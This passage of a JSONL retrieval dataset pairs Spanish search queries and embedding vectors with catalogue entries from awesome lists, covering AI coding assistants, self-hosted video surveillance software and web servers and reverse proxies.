0.06399, -0.1142, -0.07286, 0.01772, -0.0246, -0.01494, 0.02396, 0.02687, 0.01262, 0.00524, -0.09473, 0.05345, -0.11959, 0.01381, -0.05156, 0.02728, -0.00147, 0.01813, -0.0264, 0.08237, 0.12513, 0.02586, 0.0078, -0.00713, -0.04492, 0.02479, -0.05301, -0.0671, 0.07285, 0.02602, 0.0108, 0.00261, 0.0358, 0.08275, -0.01424, 0.04374, 0.04269, -0.05015, 0.04854, -0.01247, 0.06567, 0.01529, 0.15246, -0.04258, -0.05686, 0.04901, 0.01642, 0.05171, 0.06189, -0.08212, -0.02499, 0.00269, 0.04325, -0.02963, 0.03793, -0.02676, -0.08528, -0.01012, 0.05659, -0.0324, -0.01938, -0.01682, 0.01957, 0.01549, -0.03545, -0.02494, 0.09797, 0.05543, -0.0374, 0.14127, 0.05886, -0.05396, -0.00394, -0.05407, -0.02754, 0.04863, -0.06186, -0.05688, 0.05371, -0.15434, 0.02426, 0.00247, 0.04134, 0.07611, -0.00984, -0.03806, 0.04004, 0.02598, -0.01833, -0.00044, -0.06863, 0.00119, 0.05154, -0.02852, 0.02768, 0.05467, -0.11119, -0.00399, -0.01745, 0.00525, -0.11467, 0.08046, -0.10578, -0.08468, -0.03288, 0.00235, 0.00094, -0.04571, -0.05738, -0.0388, 0.08994, 0.07318, 0.01961, 0.05731, 0.04272, -0.05477, -0.00849, -0.05079, -0.02495, -0.05659, 0.00872, -0.09678, -0.04803, -0.00151, -0.04606, -0.04579, -0.00206, -0.03956, 0.03515, -0.05788, 0.04623, 0.04409, 0.01302, 0.07221, 0.00898, -0.03128, -0.01198, -0.00272, -0.06743, -0.04245, 0.02844, -0.01396, -0.05814, 0.04839, -0.00042, -0.07021, 0.08857, 0.10889, -0.06431, -0.00971, -0.01194, 0.06498, -0.02735, -0.03566, 0.02411, -0.011, 0.00062, -0.08266, -0.00792, 0.02096, -0.00062, 0.07675, 0.00752, -0.02915, 0.05257, 0.00526, -0.01373, -0.01882, 0.05978, 0.02137, 0.05567, 0.00448, -0.00098, 0.0277, -0.02248, -0.02573, 0.01015, -0.03897, 0.04208, -0.03719, -0.0465, -0.05227, -0.02698, 0.06845, -0.00404, -0.05443, -0.02698, -0.05489, -0.03286, -0.0105, 0.0091, -0.058, -0.05237, 0.03657, 0.08679, -0.03679, -0.01409, -0.01581]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "indexar": "cual es una alternativa libre a los asistentes de IA para programar", "v": [0.12403, 0.13003, -0.12504, -0.07814, -0.02053, -0.06775, 0.07148, -0.05942, -0.19935, -0.0472, -0.02297, -0.11823, -0.00014, -0.02913, 0.05605, 0.01385, 0.11207, 0.00115, 0.11674, 0.1017, -0.00754, 0.1802, -0.14249, -0.02811, -0.06446, -0.06395, 0.02332, 0.04745, -0.03314, -0.02078, -0.0386, -0.08088, 0.07489, -0.12352, 0.06973, -0.10645, 0.09271, 0.07282, 0.01641, 0.02701, 0.0023, 0.0217, -0.02498, 0.00392, 0.0739, 0.00953, -0.0185, 0.02677, -0.00145, 0.04268, -0.12889, -0.00248, 0.05828, 0.03474, 0.10513, -0.06198, 0.03901, -0.19595, -0.06009, -0.04118, -0.03732, 0.07451, -0.04173, 0.01956, 0.03918, 0.06063, 0.00304, -0.04229, -0.04367, 0.03087, -0.05233, -0.02209, -0.04889, -0.06218, -0.0404, 0.11956, -0.0869, -0.02787, 0.0046, 0.0734, -0.03338, -0.06278, 0.0564, 0.02474, -0.08569, -0.00984, 0.10712, -0.10443, -0.02334, 0.05543, 0.01891, 0.02629, 0.08347, 0.06678, 0.07317, -0.08021, 0.10554, 0.15171, 0.01422, 0.13766, 0.08195, -0.02742, -0.08843, 0.02878, -0.01494, 0.06588, 0.04417, -0.0283, -0.05014, -0.00062, 0.00394, 0.02499, -0.04974, 0.00696, 0.01254, -0.03738, 0.02751, -0.02061, 0.03959, 0.00276, -0.01264, 0.05355, -0.06187, -0.04846, 0.10184, 0.08797, -0.01106, 0.12995, -0.07488, -0.01749, 0.07958, -0.01131, -0.07519, -0.07444, -0.06628, 0.01049, 0.06118, -0.08938, 0.02361, 0.0454, -0.0161, 0.05526, 0.00465, -0.01689, 0.0939, -0.02086, 0.00437, 0.00036, -0.05198, -0.00196, -0.04534, 0.04049, 0.05294, 0.17155, -0.14439, -0.02428, -0.09916, -0.00149, -0.04036, 0.08652, -0.07056, -0.00216, 0.02432, -0.05365, -0.00677, -0.04538, -0.02332, -0.03281, -0.01434, 0.06054, 0.01066, 0.09722, 0.07643, -0.0573, 0.08014, -0.06033, 0.01947, -0.11257, 0.00356, -0.07682, 0.00173, 0.0464, -0.07311, -0.0255, -0.01645, -0.01428, 0.00712, 0.01708, 0.04767, -0.00302, -0.01663, 0.05055, -0.06019, -0.08306, -0.03159, -0.02672, -0.05993, -0.07142, 0.0155, -0.00383, -0.0368, 0.00403, 6e-05, -0.02549, 0.04465, 0.05194, -0.06362, 0.05843, 0.01586, 0.07706, 0.02286, -0.04503, 0.07776, 0.02624, -0.08868, -0.03362, 0.01232, -0.00099, 0.03149, 0.02561, 0.04312, -0.01183, 0.05162, 0.03813, -0.04555, -0.02363, 0.03098, 0.10085, 0.02129, 0.04425, -0.00041, 0.0048, -0.00706, 0.02545, -0.01644, 0.0196, -0.01686, 0.01389, -0.01936, -0.05056, 0.0397, 0.09961, -0.04681, -0.08727, -0.01303, -0.03708, -0.14417, 0.0017, -0.04599, -0.05182, -0.04772, 0.06282, 0.06557, -0.02831, 0.03378, 0.02427]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "indexar": "con que puedo automatizar tareas de codificaciΓ³n", "v": [-0.09448, 0.06375, -0.14655, -0.04645, 0.03563, -0.06401, 0.06406, 0.14756, -0.18412, 0.04706, -0.17708, -0.11047, 0.13858, 0.08363, 0.09373, 0.07761, 0.11777, -0.0946, 0.00271, 0.12944, 0.08687, -0.09279, 0.01517, -0.0173, 0.02859, 0.12026, 0.02895, -0.01777, -0.22256, 0.02701, -0.03713, 0.01166, 0.11445, -0.03618, 0.03604, 0.01526, 0.00416, 0.15471, -0.06665, 0.02394, -0.05952, 0.16047, -0.0869, 0.0907, 0.13003, 0.02249, 0.02544, -0.05509, 0.05623, -0.00467, 0.01175, -0.10486, 0.00225, -0.1138, -0.03849, -0.02896, 0.12241, -0.00396, -0.03182, -0.05916, 0.01973, 0.11552, -0.07418, 0.07971, 0.02654, 0.06863, 0.12502, 0.01723, 0.03512, 0.11314, 0.13382, -0.03287, -0.08331, -0.04995, -0.00775, 0.08267, -0.10369, -0.03047, 0.0037, -0.00424, 0.03983, 0.01907, -0.06468, -0.01448, 0.04468, -0.08651, -0.08647, -0.06735, 0.01795, -0.10441, -0.04258, -0.01606, -0.00156, 0.0486, 0.07396, 0.09358, 0.04001, -0.0104, -0.05438, 0.05806, 0.00503, -0.06549, -0.02358, 0.1347, 0.02465, 0.0824, -0.00017, 0.02888, 0.10393, -0.1094, -0.0223, -0.03047, -0.03312, -0.06595, -0.03961, 0.02461, -0.05222, 0.01102, 0.05151, -0.04379, 0.01905, 0.02284, 0.06092, 0.007, 0.08076, -0.06701, 0.11885, 0.12051, 0.01294, -0.08158, 0.05336, 0.08781, -0.03512, -0.06163, 0.04105, 0.00111, 0.05966, -0.07051, -0.10657, -0.06228, -0.07765, 0.09254, 0.061, -0.0111, 0.07935, 0.07241, -0.00683, -0.0626, -0.00799, -0.04066, 0.01069, -0.05997, 0.02027, -0.02255, 0.03161, 0.05026, 0.03184, 0.08751, 0.06643, -0.00594, -0.03718, -0.00402, -0.07253, -0.00913, -0.03805, -0.01205, 0.03664, 0.01491, -0.03564, -0.00739, -0.03154, 0.04449, 0.03895, -0.04363, 0.04302, -0.00418, 0.01819, 0.07753, 0.00767, 0.01391, -0.01409, 0.04177, 0.03269, -0.04534, 0.04686, -0.03086, 0.01297, -0.06972, 0.00676, 0.01517, -0.05989, -0.02933, -0.02334, -0.02114, 0.06238, 0.02102, 0.00086, 0.00711, -0.04708, -0.07903, -0.01053, -0.00568, 0.00527, -0.01985, -0.03973, 0.10502, 0.05144, 0.04711, 0.03646, -0.00361, 0.01699, 0.00089, 0.05215, -0.02169, -0.00071, 0.00238, -0.06094, -0.02634, 0.01174, -0.01124, 0.0401, -0.02312, 0.02028, -0.00886, 0.02377, -0.0166, 0.08346, 0.06211, 0.02196, -0.01751, -0.06054, 0.02471, 0.02111, -0.01319, 0.02394, -0.00766, -0.04692, 0.00125, -0.01491, -0.03631, 0.02386, 0.02191, 0.01554, -0.05488, -0.07298, 0.00522, -0.05039, -0.03971, -0.05631, -0.03027, -0.07158, 0.01441, -0.02063, -0.00279, 0.00399, 0.00457]} +{"tipo": "pregunta", "herramienta": "Video Surveillance", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Video Surveillance", "tema": "video surveillance", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Video Surveillance: Zoneminder β€” Closed-circuit television (CCTV) software application which supports IP, USB and Analog cameras [GPL-2.0, PHP/deb].", "indexar": "con que software puedo controlar cΓ‘maras IP y USB de forma segura?", "v": [0.09042, -0.00642, -0.20344, -0.13256, 0.01119, -0.2415, -0.10672, -0.04986, -0.05349, -0.06345, -0.02435, -0.09016, 0.02888, -0.02795, -0.10956, 0.03541, 0.00966, -0.08474, 0.04738, -0.00695, 0.09461, 0.01811, -0.06728, -0.07727, 0.00243, 0.12694, -0.06439, -0.00569, -0.07533, -0.11734, 0.01121, -0.01238, 0.07151, -0.07301, -0.18892, -0.10538, -0.03516, 0.04265, 0.10553, 0.11791, 0.07218, 0.01243, -0.01424, -0.0436, 0.14188, 0.06834, 0.03703, -0.06376, 0.08234, -0.09275, -0.10948, -0.07492, -0.03036, -0.03715, -0.07703, -0.10843, 0.02286, -0.01568, 0.01, -0.09293, -0.06175, 0.13112, 0.00674, 0.09599, -0.04496, 0.05408, -0.07329, -0.00783, -0.14268, -0.04499, 0.04967, 0.0003, -0.03489, 0.08284, 0.00589, -0.03558, -0.11355, 0.00016, 0.02862, 0.01053, -0.03523, 0.03419, -0.08167, 0.08625, -0.07569, -0.1092, 0.01411, -0.09112, -0.09184, -0.08186, 0.08424, 0.04153, 0.03263, 0.02051, 0.04237, 0.00201, 0.07388, 0.12011, -0.03748, 0.01159, 0.0456, -0.00948, -0.15656, 0.14086, -0.00734, 0.03619, 0.06238, -0.05554, -0.00637, -0.0478, -0.06571, 0.11031, -0.0412, -0.1006, -0.0279, 0.02356, 0.01441, -0.08341, 0.05525, -0.03132, 0.06622, -0.06669, -0.03425, -0.06491, 0.09972, 0.01772, -0.01022, 0.05851, -0.03384, -4e-05, 0.03623, -0.06678, -0.04587, -0.02626, 0.04973, 0.03696, 0.00416, -0.00033, -0.03621, 0.03689, -0.04549, 0.04683, -0.03832, -0.08165, 0.09484, -0.09449, -0.10301, 0.01264, -0.03318, 0.04603, 0.00139, 0.08625, -0.01787, 0.01501, -0.04647, 0.08336, 0.01544, -0.08076, -0.03925, 0.05062, 0.00058, 0.03523, -0.0023, -0.02723, 0.0522, -0.0017, -0.06023, 0.01905, 0.03649, -0.02034, -0.03707, 0.05895, 0.00125, -0.01451, -0.03894, -0.08252, -0.02096, -0.07839, 0.02614, -0.06343, -0.07357, 0.10886, 0.03344, 0.0252, 0.02115, 0.0125, 0.00247, 0.01897, 0.0045, 0.00258, 0.04324, 0.04503, 0.02938, -0.05915, 0.03968, -0.07073, -0.04788, 0.02198, -0.01627, 0.00551, -0.02643, -0.00751, -0.03122, -0.04099, 0.04307, 0.01723, -0.04373, 0.07808, 0.0086, -0.03134, 0.01711, 0.00801, 0.06914, -0.04369, -0.04277, -0.01856, 0.05536, 0.0534, -0.0363, -0.03004, 0.07385, -0.03007, 0.01577, 0.00746, -0.00563, -0.02663, -0.04668, 0.07892, 0.0073, -0.07336, -0.04674, 0.04719, -0.05896, -0.04997, 0.04852, -0.01419, -0.01158, -0.06584, -0.00495, -0.04459, -0.01643, 0.02504, -0.01804, -0.05527, -0.06627, -0.05281, -0.08039, 0.043, 0.04063, -0.09728, 0.00059, 0.0384, 0.03153, -0.02242, -0.02615, -0.01805]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Algernon β€” Small self-contained pure-Go web server with Lua, Markdown, HTTP/2, QUIC, Redis and PostgreSQL support [BSD-3-Clause, Go/Docker]. Apache HTTP Server β€” Secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards [Apache-2.0, C/deb/Docker]. BunkerWeb β€” Next-gen Web Application Firewall (WAF) that will protect your web services [AGPL-3.0, deb/Docker/K8S/Python]. Caddy β€” Powerful, enterprise-ready, open source web server with automatic HTTPS [Apache-2.0, Go/deb/Docker]. Ferron β€” Fast, memory-safe web server written in Rust [MIT, Rust/Docker/deb]. go-doxy β€” Lightweight, simple, and performant reverse proxy with WebUI, Docker integration, automatic shutdown/startup for container based on traffic [MIT, Docker/Go]. godoxy β€” High-performance reverse proxy and container orchestrator for self-hosters [MIT, Docker/Go]. HAProxy β€” Very fast and reliable reverse-proxy offering high availability, load balancing, and proxying for TCP and HTTP-based applications [GPL-2.0, C/deb/Docker].", "indexar": "que servidor web tiene soporte nativo para Lua y bases de datos?", "v": [-0.03579, 0.01128, -0.14214, -0.14784, -0.04794, -0.09585, 0.02323, -0.17264, -0.06467, 0.03392, -0.13313, -0.15898, -0.01358, -0.03688, -0.06694, 0.03104, 0.08072, -0.14439, 0.0204, -0.08019, 0.05575, 0.01912, -0.03634, -0.02518, -0.07199, 0.01744, 0.11193, -0.07354, -0.03838, 0.05168, 0.00375, -0.03173, -0.07341, 0.10541, 0.00704, 0.01713, -0.02225, 0.06387, -0.08427, 0.06961, 0.02725, -0.07511, -0.03797, -0.01216, 0.06141, -0.0352, 0.00648, -0.10051, 0.06578, -0.07593, -0.04046, -0.0524, -0.10943, -0.08966, -0.1003, -0.0336, 0.18285, -0.17843, 0.08651, 0.06277, -0.18206, 0.03802, 0.01263, -0.06355, -0.01341, 0.01201, 0.0014, -0.012, -0.07453, -0.04427, -0.02528, 0.13518, 0.06687, -0.08416, 0.06992, 0.05247, 0.07019, 0.05263, 0.02541, 0.0681, 0.00389, 0.09595, -0.04373, 0.14666, -0.13721, 0.00629, -0.00597, -0.03853, 0.04116, -0.05427, 0.11773, 0.11824, -0.11099, 0.0306, -0.01796, -0.08061, -0.00322, -0.06532, 0.01498, -0.03841, -0.00085, 0.02672, -0.01588, -0.02786, 0.12256, 0.11259, 0.16923, -0.03737, -0.02114, -0.01763, 0.0023, -0.04269, -0.05944, 0.0044, 0.03309, -0.05728, 0.06905, -0.00714, 0.04829, 0.0689, 0.03465, -0.01066, 0.06077, 0.04962, -0.0098, -0.05888, -0.00094, -0.01273, 0.0092, -0.07425, -0.03223, -0.05094, -0.04357, 0.04394, 0.03081, 0.10612, 0.02077, -0.00989, -0.05461, -0.02272, 0.02158, 0.01777, -0.08269, 0.03357, 0.14235, -0.01044, 0.09499, -0.00167, -0.07392, -0.00973, -0.00967, -0.00692, -0.01648, 0.05154, -0.17643, -0.03323, 0.00249, -0.08209, -0.01313, 0.00386, 0.04469, 0.03743, -0.0137, 0.0424, -0.04301, -0.02064, -0.02282, 0.06145, 0.08207, 0.11205, -0.0781, 0.05816, 0.01512, -0.09828, 0.02675, -0.05322, -0.08515, -0.07917, -0.01457, -0.02155, -0.0191, -0.04397, 0.00977, 0.04611, -0.01595, -0.03258, -0.02312, -0.05693, -0.00176, -0.02498, 0.01029, 0.08208, -0.03885, 0.03756, 0.06325, -0.08359, -0.05093, 0.0047, 0.05112, -0.01674, -0.06377, 0.01194, 0.00318, -0.00339, -0.03688, 0.0463, -0.02744, -0.04527, -0.00037, 0.00814, -0.05267, -0.02265, 0.05636, -0.03329, -0.04407, -0.00508, 0.08276, -0.03641, 0.00348, -0.05598, -0.06487, 0.04912, 0.03774, 0.04158, 0.01931, 0.01601, 0.07853, -0.03717, 0.06619, -0.03687, -0.00065, -0.01844, 0.01915, -0.03175, 0.02135, -0.00943, -0.00011, -0.0136, -0.03082, -0.04767, 0.00573, 0.06555, -0.04219, -0.0686, -0.01175, -0.07017, -0.06797, 0.01929, -0.02647, -0.03145, -0.03731, -0.04233, -0.0056, -0.04538, -0.01565, -0.02801]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Algernon β€” Small self-contained pure-Go web server with Lua, Markdown, HTTP/2, QUIC, Redis and PostgreSQL support [BSD-3-Clause, Go/Docker]. Apache HTTP Server β€” Secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards [Apache-2.0, C/deb/Docker]. BunkerWeb β€” Next-gen Web Application Firewall (WAF) that will protect your web services [AGPL-3.0, deb/Docker/K8S/Python]. Caddy β€” Powerful, enterprise-ready, open source web server with automatic HTTPS [Apache-2.0, Go/deb/Docker]. Ferron β€” Fast, memory-safe web server written in Rust [MIT, Rust/Docker/deb]. go-doxy β€” Lightweight, simple, and performant reverse proxy with WebUI, Docker integration, automatic shutdown/startup for container based on traffic [MIT, Docker/Go]. godoxy β€” High-performance reverse proxy and container orchestrator for self-hosters [MIT, Docker/Go]. HAProxy β€” Very fast and reliable reverse-proxy offering high availability, load balancing, and proxying for TCP and HTTP-based applications [GPL-2.0, C/deb/Docker].", "indexar": "hay alguna alternativa a Apache que use Go y sea muy ligera?", "v": [-0.13796, 0.14258, -0.10683, 0.14521, -0.08975, -0.00186, 0.01849, -0.04277, -0.27057, -0.10002, 0.01593, -0.09378, -0.04165, 0.08585, 0.25655, -0.15287, 0.01239, -0.01194, 0.01389, -0.02762, -0.07743, 0.14867, -0.07396, -0.04868, -0.08024, -0.09396, 0.12979, -0.04817, -0.05251, -0.02322, -0.02893, 0.06067, 0.03957, -0.01606, -0.1503, 0.07564, 0.19816, -0.14433, 0.12719, -0.0094, 0.04627, -0.1325, -0.01314, 0.02458, 0.0378, -0.05625, -0.03386, 0.0654, -0.03764, 0.03236, -0.12822, 0.05582, -0.03355, -0.01897, 0.05707, 0.11247, 0.09411, -0.08105, -0.00379, -0.08053, -0.10815, 0.04047, -0.0095, -0.04816, 0.02456, 0.09546, -0.10668, -0.10608, -0.06783, -0.02645, -0.01728, 0.02971, 0.00852, 0.01054, -0.06934, 0.03157, -0.04243, 0.00594, 0.01709, 0.01212, 0.06438, -0.04888, 0.0558, -0.00016, -0.14128, -0.04624, 0.07402, -0.0832, 0.11875, -0.03528, -0.00735, -0.00301, -0.01258, 0.08144, -0.06102, -0.04588, -0.00745, 0.01365, -0.03439, -0.00523, 0.13971, 0.04808, -0.05718, 0.03132, 0.02759, -0.0249, -0.02143, -0.0386, -0.09221, -0.03982, 0.04803, 0.06271, -0.06288, -0.00497, 0.11315, 0.00855, -0.06961, 0.00283, -0.10684, -0.01191, 0.00037, -0.04829, -0.06805, -0.01872, 0.08529, 0.0629, 0.00256, 0.02173, -0.07505, -0.04743, 0.03705, -0.04917, -0.03563, 0.02196, -0.08385, 0.03558, 0.07125, 0.01129, 0.04978, 0.02476, 0.01432, 0.03874, -0.04154, 0.00066, -0.06341, -0.02643, 0.02084, -0.05001, 0.01357, -0.00169, -0.02584, -0.10088, -0.05011, 0.07663, -0.06393, 0.04326, -0.01268, -0.02695, -0.0354, 0.00254, 0.03339, -0.02278, -0.00049, 0.04609, -0.01007, -0.00675, -0.05709, -0.06757, -0.06039, 0.06128, 0.02414, 0.00061, -0.00888, 0.01577, -0.03668, -0.06023, -0.03144, -0.01639, 0.00615, -0.04048, 0.0165, -0.00594, -0.03165, 0.05979, 0.06581, -0.06417, -0.03522, -0.00166, -0.02886, 0.01414, 0.0096, 0.05868, 0.00715, -0.08411, -0.01175, 0.01189, 0.03729, -0.08015, 0.01869, -0.00241, 0.00185, -0.02968, -0.04249, -0.0291, 0.0379, -0.01197, -0.09443, 0.04109, 0.03693, 0.0786, -0.01087, -0.03886, -0.00318, -0.04865, -0.01603, 0.04057, -0.00782, -0.04691, 0.01175, -0.00067, -0.00447, 0.02541, -0.02114, 0.0395, -0.00014, 0.04243, 0.04648, 0.00218, -0.00901, 0.00711, 0.0472, -0.00146, 0.0012, -0.00269, -0.0914, -0.0179, -0.00965, 0.0047, -0.0024, -0.03951, 0.00545, 0.03573, -0.01015, 0.06899, 0.00356, 0.09735, -0.0592, 0.04905, 0.00762, -0.02078, -0.03133, 0.00217, -0.00164, -0.00529, 0.05126, 0.0846]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Algernon β€” Small self-contained pure-Go web server with Lua, Markdown, HTTP/2, QUIC, Redis and PostgreSQL support [BSD-3-Clause, Go/Docker]. Apache HTTP Server β€” Secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards [Apache-2.0, C/deb/Docker]. BunkerWeb β€” Next-gen Web Application Firewall (WAF) that will protect your web services [AGPL-3.0, deb/Docker/K8S/Python]. Caddy β€” Powerful, enterprise-ready, open source web server with automatic HTTPS [Apache-2.0, Go/deb/Docker]. Ferron β€” Fast, memory-safe web server written in Rust [MIT, Rust/Docker/deb]. go-doxy β€” Lightweight, simple, and performant reverse proxy with WebUI, Docker integration, automatic shutdown/startup for container based on traffic [MIT, Docker/Go]. godoxy β€” High-performance reverse proxy and container orchestrator for self-hosters [MIT, Docker/Go]. HAProxy β€” Very fast and reliable reverse-proxy offering high availability, load balancing, and proxying for TCP and HTTP-based applications [GPL-2.0, C/deb/Docker].", "indexar": "cual es la mejor herramienta open source para un firewall web de prΓ³xima generaciΓ³n?", "v": [-0.06442, 0.01589, -0.16221, -0.18061, -0.05615, -0.15546, -0.08895, -0.03406, -0.0022, -0.0836, -0.0973, -0.06893, -0.08739, -0.00831, 0.03525, 0.06662, -0.04453, -0.09956, -0.03585, -0.01138, -0.11569, 0.08692, -0.0533, -0.16033, -0.04987, -0.08683, 0.06026, -0.0078, -0.1696, 0.00419, 0.11949, -0.01858, 0.07491, -0.0635, -0.06222, 0.03823, -0.01086, 0.19095, 0.01391, -0.03369, -0.08281, 0.01114, -0.09826, 0.06945, 0.11109, -0.00651, -0.08337, 0.00639, 0.05855, 0.04658, -0.08991, -0.09238, -0.0319, 0.02211, 0.05893, -0.03135, 0.20286, -0.15018, 0.03181, -0.09104, -0.15246, 0.03898, -0.04733, -0.09691, -0.08907, -0.09275, -0.06579, -0.06706, -0.10426, 0.04135, -0.03325, -0.04159, 0.02185, -0.01203, -0.00502, 0.01574, -0.00404, -0.01641, 0.05087, 0.08652, 0.08321, -0.04026, -0.02819, -0.00495, -0.09421, -0.09816, -0.02132, -0.07568, -0.03067, -0.10808, 0.02586, 0.05952, -0.10004, 0.02889, 0.06986, -0.07402, 0.07735, 0.02601, -0.06436, -0.0262, 0.012, -0.05838, -0.10854, 0.10573, 0.07295, 0.01646, -0.02062, -0.05684, -0.10929, -0.02088, 0.01413, -0.00324, 0.02984, 0.00207, 0.00318, -0.00926, -0.02472, -0.05631, 0.06208, -0.08338, 0.03265, 0.00303, -0.16791, -0.04525, -0.01043, 0.08434, -0.0214, 0.06341, -0.06296, -0.05135, -0.02976, -0.1315, -0.07983, -0.02955, -0.06308, -0.05125, 0.00892, -0.09032, -0.00319, -0.03326, 0.05756, -0.00609, 0.00873, -0.06739, 0.02311, -0.01667, -0.02355, -0.06029, -0.06771, -0.01922, -0.02915, -0.02666, -0.04287, 0.04027, -0.10098, 0.03207, -0.0571, 0.0225, 0.00233, 0.09329, 0.04149, -0.04784, 0.01688, 0.01211, -0.02195, 0.04227, -0.02287, 0.06057, 0.06877, 0.01242, 0.01299, 0.04122, -0.01962, -0.0643, -0.01445, -0.07859, -0.07178, 0.01451, 0.04671, -0.05786, -0.03652, -0.01749, -0.08009, -0.01893, -0.03456, -0.04395, 0.03071, -0.04096, -0.00611, 0.06779, 0.05054, 0.01038, -0.00926, -0.0062, 0.04112, -0.06329, -0.02904, -0.07253, 0.06906, 0.03043, -0.07925, -0.04737, -0.03031, -0.09647, 0.02439, 0.07639, -0.03304, -0.0802, 0.00231, 0.00274, 0.0784, -0.00243, 0.0559, -0.02197, -0.01578, -0.00817, 0.01503, -0.01568, 0.01142, 0.01242, 0.01748, 0.05089, -0.01017, -0.04259, -0.02921, -0.01911, -0.02956, 0.02316, 0.04905, -0.03937, -0.00264, -0.04128, -0.02457, -0.02206, 0.04737, -0.04205, -0.01153, -0.03681, -0.02527, -0.0771, -0.01864, -0.00407, 0.00707, -0.02737, -0.00131, -0.05955, -0.06105, 0.00127, -0.00753, -0.12102, -0.065, -0.02302, 0.00092, -0.00923, 0.02693, -0.01426]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Lighttpd β€” Secure, fast, compliant, and very flexible web server that has been optimized for high-performance environments [BSD-3-Clause, C/deb/Docker]. Nginx Proxy Manager β€” Docker container for managing Nginx proxy hosts with a simple, powerful interface [MIT, Docker]. NGINX β€” HTTP and reverse proxy server, mail proxy server, and generic TCP/UDP proxy server [BSD-2-Clause, C/deb/Docker]. Pangolin β€” Identity-aware tunneled reverse proxy with dashboard UI, access control, and WireGuard-based tunnels (alternative to Cloudflare Tunnel, Tailscale) [AGPL-3.0, Docker]. Pomerium β€” Identity-aware reverse proxy, successor to now obsolete oauth_proxy. It inserts an OAuth step before proxying your request to the backend, so that you can safely expose your self-hosted websites to public Internet [Apache-2.0, Go/Docker]. SafeLine β€” Web application firewall / reverse proxy to protect your web apps from attacks and exploits [GPL-3.0, Docker].", "indexar": "ΒΏcuΓ‘l es un servidor web ligero y rΓ‘pido que se optimice para entornos de alto rendimiento?", "v": [-0.01015, 0.02648, -0.17419, -0.12165, -0.01579, -0.11618, -0.10699, -0.05611, -0.01056, -0.05245, -0.05924, -0.12697, -0.01307, 0.01098, 0.1205, 0.05285, 0.05382, -0.05593, -0.01988, 0.00486, 0.00419, -0.06144, -0.11244, -0.081, 0.03468, -0.03802, 0.12688, 0.06948, -0.14655, -0.05532, -0.01771, 0.08487, 0.02862, -0.01584, 0.05208, -0.06692, -0.00939, 0.17357, -0.01921, 0.0363, 0.04427, -0.0228, -0.06685, -0.03399, 0.11035, 0.02887, 0.0793, 0.0161, 0.1955, -0.11509, -0.0694, -0.10868, -0.04249, -0.12653, -0.08123, 0.059, 0.04046, -0.11084, 0.12587, -0.18757, -0.05178, 0.02792, -0.03806, -0.15814, 0.03551, 0.0052, -0.06414, -0.00948, -0.01459, -0.03751, 0.00282, -0.02632, 0.03764, -0.05956, 0.13949, 0.10051, -0.04164, 0.04685, -0.025, 0.04491, 0.05938, 0.02512, -0.01893, 0.14354, -0.15606, -0.06888, -0.01325, -0.1196, 0.1004, 0.0571, 0.0873, 0.02621, -0.077, 0.00773, -0.00536, -0.06668, 0.11063, -0.05782, -0.03037, 0.00854, -0.00941, 0.03126, -0.08153, 0.02445, -0.02441, 0.12804, 0.04894, -0.08905, -0.07864, 0.00815, 0.05338, -0.05494, -0.03302, 0.02429, -0.01474, -0.01764, -0.00997, 0.03194, -0.01345, -0.07131, -0.02789, -0.00428, 0.01913, -0.03889, -0.04476, -0.00402, 0.06013, 0.0039, 0.02023, -0.12616, -0.01077, -0.03111, -0.06798, -0.03522, -0.02037, 0.04739, 0.03847, -0.03414, -0.02764, -0.01071, 0.04231, -0.04863, -0.09277, 0.03138, 0.10338, -0.05148, 0.07915, -0.0575, -0.06741, 0.07811, 0.02973, -0.03524, 0.00236, -0.04829, -0.16002, -0.06496, -0.01607, -0.03455, -0.11271, -0.01157, 0.01425, 0.04211, 0.08864, 0.06863, 0.03167, -0.01021, 0.01944, 0.05521, 0.00206, 0.0738, -0.06733, -0.0334, -0.03719, -0.11276, 0.03895, 0.00153, -0.03301, 